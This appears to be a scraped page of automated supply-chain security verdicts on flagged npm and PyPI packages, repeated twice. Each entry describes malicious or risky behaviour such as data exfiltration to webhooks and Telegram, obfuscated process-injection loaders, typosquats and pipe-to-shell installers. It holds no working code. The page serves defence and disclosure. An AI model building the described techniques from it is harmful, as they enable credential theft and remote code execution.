Secure your dependencies. Ship with confidence.

This module implements direct, unauthorized data exfiltration: it reads a likely sensitive file (/flag.txt) and posts its contents to a hard-coded external webhook along with a package identifier. It executes on import, suppresses errors to avoid detection, and provides no legitimate justification for this behavior. Treat the code as malicious/backdoor; do not run or deploy it. Remove the file from the codebase, investigate the package origin, and rotate any exposed secrets.

Live on pypi for 5 hours and 19 minutes before removal. Socket users were protected even while the package was live.

This module is an automation/scraping worker that intentionally executes code provided by task descriptions. That design requires trusting the task source. The code contains multiple high-risk sinks: subprocess with shell=True, exec()/eval of task-supplied code, and browser JS execution. It also copies browser user profiles (cookies/credentials) into temporary profiles, which increases risk of credential theft. If task inputs are untrusted (remote server controlled by attacker or tampered local JSON), an attacker can achieve remote code execution, data exfiltration (files, cookies), or arbitrary system changes. Recommendation: only run with tasks from trusted sources, disable remote task fetching unless secured, avoid copying full user-data profiles, and remove/guard exec/eval/subprocess paths or run worker inside a hardened sandbox/container with least privileges.

This module implements privileged node and device management and exposes HTTP endpoints that accept user input used directly in shell commands and Docker operations. Main risks: command injection (unsanitized string interpolation into shell commands and os.popen), destructive device operations (partitioning, bind/unbind), supplying arbitrary images to be pulled and run as privileged containers, and use of an unencrypted/unprotected Docker TCP socket (tcp://...:2375). I assess this as not manifestly malware but a high-risk administrative component that must be strictly access-controlled and hardened (validate/sanitize inputs, avoid passing raw user values into shell/Docker operations, use secure Docker API access, avoid exposing endpoints publicly).

This module is a high-risk utility because it fetches Python code from remote URLs and local markdown files and executes that code directly via execute_py_script_string_as_new_proc without validation or sandboxing. The code itself does not contain obvious obfuscation or hardcoded credentials, but it provides an execution surface that enables remote code execution and potential data exfiltration or system compromise depending on the executed snippets and the implementation of execute_py_script_string_as_new_proc. Treat calls that use remote URLs or untrusted markdown as dangerous. Use only with trusted content or add validation/sandboxing (e.g., static analysis of snippets, running in containers with restricted privileges, allowlists, checksums/signatures).

This module is functionally a minimal serializer that reconstructs objects by evaluating repr()-based strings. It contains an immediate and severe security flaw: loads() decodes external input and feeds it to eval(), and it may import modules based on the serialized text before evaluation. While not explicitly malicious, the code enables arbitrary code execution and import-time side effects when deserializing untrusted data. Treat this as high risk — avoid using it on untrusted inputs and refactor to safer serialization patterns.

This code is an administrative automation component that deliberately executes arbitrary ServiceNow server-side scripts and manipulates system tables. I found no clear signs of intentionally malicious code (no hardcoded external exfiltration endpoints, no obfuscated payload). However, it exposes powerful sinks: arbitrary script execution, creation of background script records, and storage of script output/trace in sys_properties. The primary security risk is abuse/misconfiguration (e.g., autoConfirm bypass, insufficient RBAC) leading to data theft or destructive changes. Treat this module as high-risk functionality that must be strictly access controlled, audited, and hardened before use.

This file retrieves and executes scripts from 149[.]88[.]81[.]211, installs ngrok with a hardcoded token, and launches a Jupyter Lab server configured for open access. The use of persistent background processes, elevated privileges via sudo, and unvalidated remote downloads pose significant risks, enabling unauthorized remote access or data exfiltration.

The Python module itself is not directly implementing typical malware behaviors, but it creates a high-risk execution surface: it runs local shell scripts (some with sudo) with unvalidated inputs and passes secrets on the command line. The deploy_fdb_from_file_service function contains a command-injection vulnerability (shell=True with joined args) and a coding bug (returncod typo). Recommend: remove shell=True; use argument lists always, avoid passing secrets via argv (use stdin, environment files with proper filesystem permissions, or secured IPC), eliminate unnecessary sudo calls and require callers to provide appropriate privileges if needed, validate/escape inputs (especially file paths), fix the returncod typo, and audit all invoked shell scripts before use. Treat package as risky until mitigations and script audits are performed.

This code implements a sophisticated remote access backdoor that accepts and executes arbitrary JavaScript code from remote WebSocket connections. The combination of heavy obfuscation, remote code execution vulnerability, and persistent reconnection establishes unauthorized system access, confirming its nature as malware.

Possible typosquat of [azure](https://socket.dev/npm/package/azure) Explanation: The package 'azure-graphrbac' is labeled as a 'security holding package', which often indicates a placeholder to prevent typosquatting. The name 'azure-graphrbac' closely resembles 'azure' and could be misleading. The maintainers list includes 'npm', which is not a specific known maintainer. The description does not provide enough information to determine a distinct purpose, and the similarity in naming suggests it could be a typosquat. azure-graphrbac is a security-holding package

Live on npm for 3 hours and 49 minutes before removal. Socket users were protected even while the package was live.

This assembly contains heavy obfuscation and an embedded loader/unpacker that decrypts resources and performs runtime integrity checks, then uses native API calls to allocate memory and write into other processes. The presence of VirtualAlloc/OpenProcess/WriteProcessMemory/VirtualProtect combined with decryption of bundled data and dynamic delegate creation indicates code injection capability and an active unpacker. Even though the assembly also exposes UI controls, the loader component is malicious or potentially weaponizable (process injection/backdoor). Do not trust or use this package in production; it should be treated as malicious and removed from the supply chain.

This assembly contains an obfuscated payload loader/unpacker. It reads embedded resources or files, verifies signatures, decrypts data with a hard-coded AES key/IV, then allocates and writes executable memory and constructs runtime delegates and dynamic methods to execute the unpacked payload. It also enumerates processes/modules and uses kernel32 APIs (VirtualAlloc/WriteProcessMemory/VirtualProtect/OpenProcess) — behavior consistent with code injection or an in-memory loader/backdoor. Given the divergence between the public-facing API names and the contained low-level behaviors, treat this package as malicious/untrusted and remove it from sensitive environments.

The code is clearly designed to exfiltrate system information and file contents to external servers, indicating malicious intent. The presence of an infinite loop for data collection further exacerbates the security risk.

Live on npm for 14 minutes before removal. Socket users were protected even while the package was live.

This module implements a credential- and data-exfiltration pattern: it reads a local OpenAI-like token and user prompt and sends both to a non-official, lookalike endpoint (chatgpt.com/...). The request headers and payload mimic official OpenAI traffic, increasing the likelihood this is designed to harvest usable credentials. There is no obfuscation and no destructive payload, but transmitting long-lived tokens and account identifiers to an untrusted domain is a high-risk malicious behavior. Recommendation: Do not run this code where you store real credentials; treat tokens in ~/.pi/agent/auth.json as compromised if this script was present. Replace with official API calls or verify remote endpoint ownership before use.

[Skill Scanner] Pipe-to-shell or eval pattern detected All findings: [CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4] [CRITICAL] command_injection: URL pointing to executable file detected (CI010) [AITech 9.1.4] [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [HIGH] command_injection: Reference to external script with install/setup context (SC005) The skill is conceptually benign and its capabilities align with its stated purpose (generate/validate/fix mirrord.json using packaged schema + the mirrord CLI). The primary security concern is the instruction to install mirrord via curl | bash (raw GitHub script execution) and the implicit trust placed in the external mirrord binary run during validation. Those steps create a supply-chain risk (remote code execution and potential network telemetry/exfiltration by the external installer/CLI) and should be treated with caution: prefer package manager installs with verified provenance, or require explicit manual review of installer scripts and provide hash/signature checks. No direct evidence of malware or obfuscation exists in the skill content itself. LLM verification: The mirrord-config skill is effectively aligned with its primary purpose of generating and validating configurations. However, it exhibits high-risk installation guidance (curl | bash and external installers) that introduces significant supply-chain and host-security risks. To improve security posture, replace or supplement remote-install steps with verifiable, signed artifacts via official package managers or pre-vetted binaries, add checksum/signature validation, and clearly separate tool inst

This script is potentially malicious as it is sending sensitive system information to a remote server without the user's consent. It could be used for data exfiltration or other malicious purposes.

Live on npm for 24 minutes before removal. Socket users were protected even while the package was live.

This file is a concentrated collection of active exploit/deserialization payloads designed to detect or trigger known gadget chains and vulnerabilities across multiple platforms. While formatted as a testing catalog, its content is inherently dangerous: it includes explicit command-execution payloads, remote class-loading references, and authentication-bypass tokens. If found in a codebase or dependency, treat as high-risk—remove from production, restrict access, audit any use or transmission logs, and verify no unauthorized target interactions occurred. Only use in controlled, authorized testing environments.

This HTML file contains clear malicious content with repeated attempts to load unknown JavaScript from the local file system. The file:// protocol usage combined with the suspicious filename and excessive repetition indicates a high-risk security threat that could lead to local system compromise.

This file mixes legitimate helper types (JSON converters, cache managers, Redis, Wx settings, QR code utilities) with a large, highly obfuscated loader/unpacker that reads encrypted resources, performs decryption, manipulates process memory, P/Invokes native APIs (VirtualAlloc/mprotect/WriteProcessMemory/OpenProcess/etc.), dynamically generates delegates/methods, and executes code in memory. Those capabilities (resource decryption -> write into executable memory -> change protections -> invoke) are typical of packers, runtime unpackers, or implant loaders and are high-risk in a dependency. I consider this behavior malicious or at least extremely risky for supply-chain use: the module can execute code not visible in source, perform process memory operations, detect tampering, and load native/jitted payloads. Recommend removing or sandboxing and performing full binary/behavioral analysis before use.

[Skill Scanner] Pipe-to-shell or eval pattern detected All findings: [CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] This skill is functionally coherent with its stated purpose (hosted browser automation via inference.sh) and contains expected high-risk capabilities for such a tool: arbitrary JavaScript execution, file uploads, proxy configuration, and routing through a hosted backend. There is no direct evidence in the provided document of hidden malicious code or obfuscation. However, the design requires high trust in the inference.sh distribution and backend because sensitive data (page DOM, cookies, uploaded local files, videos/screenshots, user credentials) will transit through that service. The most likely abuse scenarios are credential/data harvesting via a malicious proxy or compromise of the inference.sh backend or CLI binary. I rate this as suspicious/high-risk in a supply-chain sense (not evidently malicious in the file itself) and recommend careful review of the inference.sh binaries, hosting operator trust, and limiting use of proxy/execute/file-upload features when handling sensitive data. LLM verification: The agent-browser skill's documented capabilities match legitimate Playwright-based browser automation tools, but multiple high-risk design and supply-chain elements are present: a pipe-to-shell installer pattern, reliance on external distribution domains, remote execution via inference.sh infrastructure, arbitrary JS execution in page context, local-file upload capability, and proxy credential handling. These create significant opportunities for sensitive-data exposure or misuse if the inferenc

The source code is contains embedded inappropriate adult content with numerous external image links. It is not valid or functional software code. No explicit malware or direct security vulnerabilities are detected, but the presence of inappropriate content and corrupted format poses a significant security and content risk. This package should be rejected or quarantined due to high risk and inappropriate content.

The code is designed to collect and exfiltrate rich host information to a Telegram bot without user consent, using embedded credentials and silent operation. This constitutes data exfiltration with backdoor-like traits and represents a high security risk. Hardcoded credentials enable uncontrolled data leakage, and access to sensitive files (e.g., /etc/passwd) and environment variables worsens the risk. Remove hardcoded credentials, implement explicit user consent, limit data collection, and avoid automatic exfiltration from dependencies.

The code exhibits behaviors typical of malware, such as unauthorized data collection and transmission to an external server. The use of a Discord webhook for data exfiltration is particularly concerning. The provided reports are placeholders and do not offer any analysis, necessitating a reevaluation based on the code's behavior.

This code implements an insecure, unauthenticated RPC mechanism that allows remote clients to cause arbitrary code execution and exfiltrate files/system information. Using pickle over an untrusted network and invoking methods by client-supplied names are severe supply-chain/backdoor risks. Do not deploy or reuse this code in production; it should be treated as a backdoor/untrusted remote-execution component unless wrapped with strong authentication, authorization, sandboxing, and safe serialization.

This module implements direct, unauthorized data exfiltration: it reads a likely sensitive file (/flag.txt) and posts its contents to a hard-coded external webhook along with a package identifier. It executes on import, suppresses errors to avoid detection, and provides no legitimate justification for this behavior. Treat the code as malicious/backdoor; do not run or deploy it. Remove the file from the codebase, investigate the package origin, and rotate any exposed secrets.

Live on pypi for 5 hours and 19 minutes before removal. Socket users were protected even while the package was live.

This module is an automation/scraping worker that intentionally executes code provided by task descriptions. That design requires trusting the task source. The code contains multiple high-risk sinks: subprocess with shell=True, exec()/eval of task-supplied code, and browser JS execution. It also copies browser user profiles (cookies/credentials) into temporary profiles, which increases risk of credential theft. If task inputs are untrusted (remote server controlled by attacker or tampered local JSON), an attacker can achieve remote code execution, data exfiltration (files, cookies), or arbitrary system changes. Recommendation: only run with tasks from trusted sources, disable remote task fetching unless secured, avoid copying full user-data profiles, and remove/guard exec/eval/subprocess paths or run worker inside a hardened sandbox/container with least privileges.

This module implements privileged node and device management and exposes HTTP endpoints that accept user input used directly in shell commands and Docker operations. Main risks: command injection (unsanitized string interpolation into shell commands and os.popen), destructive device operations (partitioning, bind/unbind), supplying arbitrary images to be pulled and run as privileged containers, and use of an unencrypted/unprotected Docker TCP socket (tcp://...:2375). I assess this as not manifestly malware but a high-risk administrative component that must be strictly access-controlled and hardened (validate/sanitize inputs, avoid passing raw user values into shell/Docker operations, use secure Docker API access, avoid exposing endpoints publicly).

This module is a high-risk utility because it fetches Python code from remote URLs and local markdown files and executes that code directly via execute_py_script_string_as_new_proc without validation or sandboxing. The code itself does not contain obvious obfuscation or hardcoded credentials, but it provides an execution surface that enables remote code execution and potential data exfiltration or system compromise depending on the executed snippets and the implementation of execute_py_script_string_as_new_proc. Treat calls that use remote URLs or untrusted markdown as dangerous. Use only with trusted content or add validation/sandboxing (e.g., static analysis of snippets, running in containers with restricted privileges, allowlists, checksums/signatures).

This module is functionally a minimal serializer that reconstructs objects by evaluating repr()-based strings. It contains an immediate and severe security flaw: loads() decodes external input and feeds it to eval(), and it may import modules based on the serialized text before evaluation. While not explicitly malicious, the code enables arbitrary code execution and import-time side effects when deserializing untrusted data. Treat this as high risk — avoid using it on untrusted inputs and refactor to safer serialization patterns.

This code is an administrative automation component that deliberately executes arbitrary ServiceNow server-side scripts and manipulates system tables. I found no clear signs of intentionally malicious code (no hardcoded external exfiltration endpoints, no obfuscated payload). However, it exposes powerful sinks: arbitrary script execution, creation of background script records, and storage of script output/trace in sys_properties. The primary security risk is abuse/misconfiguration (e.g., autoConfirm bypass, insufficient RBAC) leading to data theft or destructive changes. Treat this module as high-risk functionality that must be strictly access controlled, audited, and hardened before use.

This file retrieves and executes scripts from 149[.]88[.]81[.]211, installs ngrok with a hardcoded token, and launches a Jupyter Lab server configured for open access. The use of persistent background processes, elevated privileges via sudo, and unvalidated remote downloads pose significant risks, enabling unauthorized remote access or data exfiltration.

The Python module itself is not directly implementing typical malware behaviors, but it creates a high-risk execution surface: it runs local shell scripts (some with sudo) with unvalidated inputs and passes secrets on the command line. The deploy_fdb_from_file_service function contains a command-injection vulnerability (shell=True with joined args) and a coding bug (returncod typo). Recommend: remove shell=True; use argument lists always, avoid passing secrets via argv (use stdin, environment files with proper filesystem permissions, or secured IPC), eliminate unnecessary sudo calls and require callers to provide appropriate privileges if needed, validate/escape inputs (especially file paths), fix the returncod typo, and audit all invoked shell scripts before use. Treat package as risky until mitigations and script audits are performed.

This code implements a sophisticated remote access backdoor that accepts and executes arbitrary JavaScript code from remote WebSocket connections. The combination of heavy obfuscation, remote code execution vulnerability, and persistent reconnection establishes unauthorized system access, confirming its nature as malware.

Possible typosquat of [azure](https://socket.dev/npm/package/azure) Explanation: The package 'azure-graphrbac' is labeled as a 'security holding package', which often indicates a placeholder to prevent typosquatting. The name 'azure-graphrbac' closely resembles 'azure' and could be misleading. The maintainers list includes 'npm', which is not a specific known maintainer. The description does not provide enough information to determine a distinct purpose, and the similarity in naming suggests it could be a typosquat. azure-graphrbac is a security-holding package

Live on npm for 3 hours and 49 minutes before removal. Socket users were protected even while the package was live.

This assembly contains heavy obfuscation and an embedded loader/unpacker that decrypts resources and performs runtime integrity checks, then uses native API calls to allocate memory and write into other processes. The presence of VirtualAlloc/OpenProcess/WriteProcessMemory/VirtualProtect combined with decryption of bundled data and dynamic delegate creation indicates code injection capability and an active unpacker. Even though the assembly also exposes UI controls, the loader component is malicious or potentially weaponizable (process injection/backdoor). Do not trust or use this package in production; it should be treated as malicious and removed from the supply chain.

This assembly contains an obfuscated payload loader/unpacker. It reads embedded resources or files, verifies signatures, decrypts data with a hard-coded AES key/IV, then allocates and writes executable memory and constructs runtime delegates and dynamic methods to execute the unpacked payload. It also enumerates processes/modules and uses kernel32 APIs (VirtualAlloc/WriteProcessMemory/VirtualProtect/OpenProcess) — behavior consistent with code injection or an in-memory loader/backdoor. Given the divergence between the public-facing API names and the contained low-level behaviors, treat this package as malicious/untrusted and remove it from sensitive environments.

The code is clearly designed to exfiltrate system information and file contents to external servers, indicating malicious intent. The presence of an infinite loop for data collection further exacerbates the security risk.

Live on npm for 14 minutes before removal. Socket users were protected even while the package was live.

This module implements a credential- and data-exfiltration pattern: it reads a local OpenAI-like token and user prompt and sends both to a non-official, lookalike endpoint (chatgpt.com/...). The request headers and payload mimic official OpenAI traffic, increasing the likelihood this is designed to harvest usable credentials. There is no obfuscation and no destructive payload, but transmitting long-lived tokens and account identifiers to an untrusted domain is a high-risk malicious behavior. Recommendation: Do not run this code where you store real credentials; treat tokens in ~/.pi/agent/auth.json as compromised if this script was present. Replace with official API calls or verify remote endpoint ownership before use.

[Skill Scanner] Pipe-to-shell or eval pattern detected All findings: [CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4] [CRITICAL] command_injection: URL pointing to executable file detected (CI010) [AITech 9.1.4] [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [HIGH] command_injection: Reference to external script with install/setup context (SC005) The skill is conceptually benign and its capabilities align with its stated purpose (generate/validate/fix mirrord.json using packaged schema + the mirrord CLI). The primary security concern is the instruction to install mirrord via curl | bash (raw GitHub script execution) and the implicit trust placed in the external mirrord binary run during validation. Those steps create a supply-chain risk (remote code execution and potential network telemetry/exfiltration by the external installer/CLI) and should be treated with caution: prefer package manager installs with verified provenance, or require explicit manual review of installer scripts and provide hash/signature checks. No direct evidence of malware or obfuscation exists in the skill content itself. LLM verification: The mirrord-config skill is effectively aligned with its primary purpose of generating and validating configurations. However, it exhibits high-risk installation guidance (curl | bash and external installers) that introduces significant supply-chain and host-security risks. To improve security posture, replace or supplement remote-install steps with verifiable, signed artifacts via official package managers or pre-vetted binaries, add checksum/signature validation, and clearly separate tool inst

This script is potentially malicious as it is sending sensitive system information to a remote server without the user's consent. It could be used for data exfiltration or other malicious purposes.

Live on npm for 24 minutes before removal. Socket users were protected even while the package was live.

This file is a concentrated collection of active exploit/deserialization payloads designed to detect or trigger known gadget chains and vulnerabilities across multiple platforms. While formatted as a testing catalog, its content is inherently dangerous: it includes explicit command-execution payloads, remote class-loading references, and authentication-bypass tokens. If found in a codebase or dependency, treat as high-risk—remove from production, restrict access, audit any use or transmission logs, and verify no unauthorized target interactions occurred. Only use in controlled, authorized testing environments.

This HTML file contains clear malicious content with repeated attempts to load unknown JavaScript from the local file system. The file:// protocol usage combined with the suspicious filename and excessive repetition indicates a high-risk security threat that could lead to local system compromise.

This file mixes legitimate helper types (JSON converters, cache managers, Redis, Wx settings, QR code utilities) with a large, highly obfuscated loader/unpacker that reads encrypted resources, performs decryption, manipulates process memory, P/Invokes native APIs (VirtualAlloc/mprotect/WriteProcessMemory/OpenProcess/etc.), dynamically generates delegates/methods, and executes code in memory. Those capabilities (resource decryption -> write into executable memory -> change protections -> invoke) are typical of packers, runtime unpackers, or implant loaders and are high-risk in a dependency. I consider this behavior malicious or at least extremely risky for supply-chain use: the module can execute code not visible in source, perform process memory operations, detect tampering, and load native/jitted payloads. Recommend removing or sandboxing and performing full binary/behavioral analysis before use.

[Skill Scanner] Pipe-to-shell or eval pattern detected All findings: [CRITICAL] command_injection: Pipe-to-shell or eval pattern detected (CI013) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] [CRITICAL] command_injection: Instruction directing agent to run/execute external content (CI011) [AITech 9.1.4] This skill is functionally coherent with its stated purpose (hosted browser automation via inference.sh) and contains expected high-risk capabilities for such a tool: arbitrary JavaScript execution, file uploads, proxy configuration, and routing through a hosted backend. There is no direct evidence in the provided document of hidden malicious code or obfuscation. However, the design requires high trust in the inference.sh distribution and backend because sensitive data (page DOM, cookies, uploaded local files, videos/screenshots, user credentials) will transit through that service. The most likely abuse scenarios are credential/data harvesting via a malicious proxy or compromise of the inference.sh backend or CLI binary. I rate this as suspicious/high-risk in a supply-chain sense (not evidently malicious in the file itself) and recommend careful review of the inference.sh binaries, hosting operator trust, and limiting use of proxy/execute/file-upload features when handling sensitive data. LLM verification: The agent-browser skill's documented capabilities match legitimate Playwright-based browser automation tools, but multiple high-risk design and supply-chain elements are present: a pipe-to-shell installer pattern, reliance on external distribution domains, remote execution via inference.sh infrastructure, arbitrary JS execution in page context, local-file upload capability, and proxy credential handling. These create significant opportunities for sensitive-data exposure or misuse if the inferenc

The source code is contains embedded inappropriate adult content with numerous external image links. It is not valid or functional software code. No explicit malware or direct security vulnerabilities are detected, but the presence of inappropriate content and corrupted format poses a significant security and content risk. This package should be rejected or quarantined due to high risk and inappropriate content.

The code is designed to collect and exfiltrate rich host information to a Telegram bot without user consent, using embedded credentials and silent operation. This constitutes data exfiltration with backdoor-like traits and represents a high security risk. Hardcoded credentials enable uncontrolled data leakage, and access to sensitive files (e.g., /etc/passwd) and environment variables worsens the risk. Remove hardcoded credentials, implement explicit user consent, limit data collection, and avoid automatic exfiltration from dependencies.

The code exhibits behaviors typical of malware, such as unauthorized data collection and transmission to an external server. The use of a Discord webhook for data exfiltration is particularly concerning. The provided reports are placeholders and do not offer any analysis, necessitating a reevaluation based on the code's behavior.

This code implements an insecure, unauthenticated RPC mechanism that allows remote clients to cause arbitrary code execution and exfiltrate files/system information. Using pickle over an untrusted network and invoking methods by client-supplied names are severe supply-chain/backdoor risks. Do not deploy or reuse this code in production; it should be treated as a backdoor/untrusted remote-execution component unless wrapped with strong authentication, authorization, sandboxing, and safe serialization.